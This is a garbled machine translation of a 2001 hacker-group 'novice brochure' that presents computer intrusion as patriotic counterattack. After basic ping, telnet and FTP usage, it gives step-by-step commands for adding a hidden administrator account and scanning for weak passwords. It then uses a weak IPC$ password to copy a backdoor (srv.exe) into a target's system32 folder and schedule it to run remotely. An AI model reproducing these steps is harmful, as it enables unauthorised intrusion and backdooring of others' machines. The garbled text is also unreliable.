Hellis novice entry brochure www.sandflee.net 2001-12-15 Gray trajectory transferred from China Network Legion! Dear rookie comrades, Hellis will lead you to the network self-defense counterattack of Baoda Wei Guo. 2) Warm-up exercise first come to the order, familiar with our surroundings. 2. Ping C: /> ping /? Usage: ping [-t] [-a] [-n count] [-l size] [-f ] [-I tos] [-r count] [-j host-list] | [-k host-list] [-w timeout] Destination-list Several common options: Options: -t life endless, ping is constant, ctrl ^ C to terminate - N count Send Count ICMP Echo Packet - L size Size -i TTL Survival, usually if you and the target The network node is greater than TTL, then you will arrive at the target -w timeout, the response of the Timeout milliseconds has not come yet, it will say that the request time OUT example: ping -l 250 -w 3500 www.xxx.com -t results These Almost) (1) The other party gives a response: reply from xxx.xxx.xxx.xxx: Bytes = 250 TIME = 110ms TTL = 253 (2) Host without this name: unknown host www.xxx.com. (3) connection To the host time or the other side firewall or host mask ICMP: Request Timeout. (4) The other party is shut down or firewall in the defrauded you: Destination Unreachable. 2.2 Telnet C: /> Telnet Microsoft Telnet> Help Close Close Current connection Display display operation Parameters OPEN Connect to a site quit Exit Telnet SET Settings Option (To list the 'set?') Status Print Status Information Unset Unset Settings Options (To list, type 'unset?')? / Help Print Help Information Microsoft Telnet > set? Microsoft Telnet> UNSET? Example: (1) Open Local Back. Microsoft Telnet> Set local_echo (2) Connection Target: Microsoft Telnet> Open 127.0.0.1 18888 is being connected to 127.0.0.1 ... Unable to open to the host in port 18888: The connection failed, otherwise the other side picture ~~ 2.3 FTP manual operation Edition: c: /> ftp c: /> ftp ftp>? Commands May Be Abbreviated. Commands are:! Delete Litral PROMPT Send? Debug ls put status append Dir Mdelete PWD trace ascii disconnect mdir quit type bell get mget quote user binary glob mkdir recv verbose bye hash mls remotehelp cd help mput rename close lcd open rmdir ftp> open www.ccc.com Connected to www.xxx.com. 220 www.xxx.com FTP Server User (www.xxx.com: "): <
Fill in the username you used, how to find the username later> Password: 230 user hellis logged in. Ftp> bin ftp> ls ftp> Get SRV. EXE FTP> BYE Automation Edition: C: /> Echo Open www.xxx.com> D C: /> Echo Your User Name >> D C: /> Echo Your Password >> D C: /> Echo LS> > D !!!!! This is checked whether the server establishes data transmission connection C: /> echo bin >> D !!!!! Here to download the options you need to download the executable C: /> echo get you wants the file> > d c: /> ftp -s: d Waiting ~~~ 2.4 Net C: /> Net User Take a look at this table, remember to have those users C: /> Net User Test Test / Add C: /> Net User Take a look, oh, there is a user TEST C: /> NET localgroup administrators test / add right-click "My Computer" -> Management -> Local Users and Groups - -> User -> Test -> Properties -> Subordinated on Wow, in Administrators and Users Group, Hahahaha, this can I want to do it, I have a warm body, start working 3) Many Baidu Of course, use a stream IV, "Detection" -> Advanced Scan Tool "->" Start Address "fill in the address of the other party -> Start !!! Next time to see the article. ..... !!! View report !!! 4) Family national envoy, national hate ... Check the stream report, pay attention to the following: (1) There is an IPC Weak Parameters stupidadmin (admin): stupidpass !! ! Pay attention to the admin in parentheses, the saliva flows out !!! (2) Telnet simple password less ... (3) FTP simple mouth to make a big place (4) Iis remote_execute_x national hatred, report he no problem ! (5) SQL SA Account Weak Calls Very useful IPC weak password attack: c: /> net us //xxx.xxx.xxx.xxx "stupidPass" / user: stupidadmin command successfully completed. C: /> net view // XXX.xxx.xxx.xxx See the other party's shared list 喽 C: /> CD stream installation directory / Tools / stream installation directory / Tools> Copy srv.exe //xxx.xxx.xxx.xxx/admin (@system32/ Wait, wait .... 1 file lopied. !!! Too good !!! Sport installation directory / Tools> at //xx.xxx.xxx.xxx list is empty. !!! No task? I will give you Plus ~~~ 嘿嘿 If you report it wrong, say the service is not open, then do this: the stream installation directory /ToolS Netsvc.exe schedule //xxx.xxx.xxx.xxx / start service successfully started. !!! Yeah, just want Waiting for a long time, I have patience ~~~ Solid installation directory / Tools> Net time //xxx.xxx.xxx.xxx //xxx.xxx.xxx.xxx's current time is 2001/12/13 PM 05: The 34 command successfully completed.
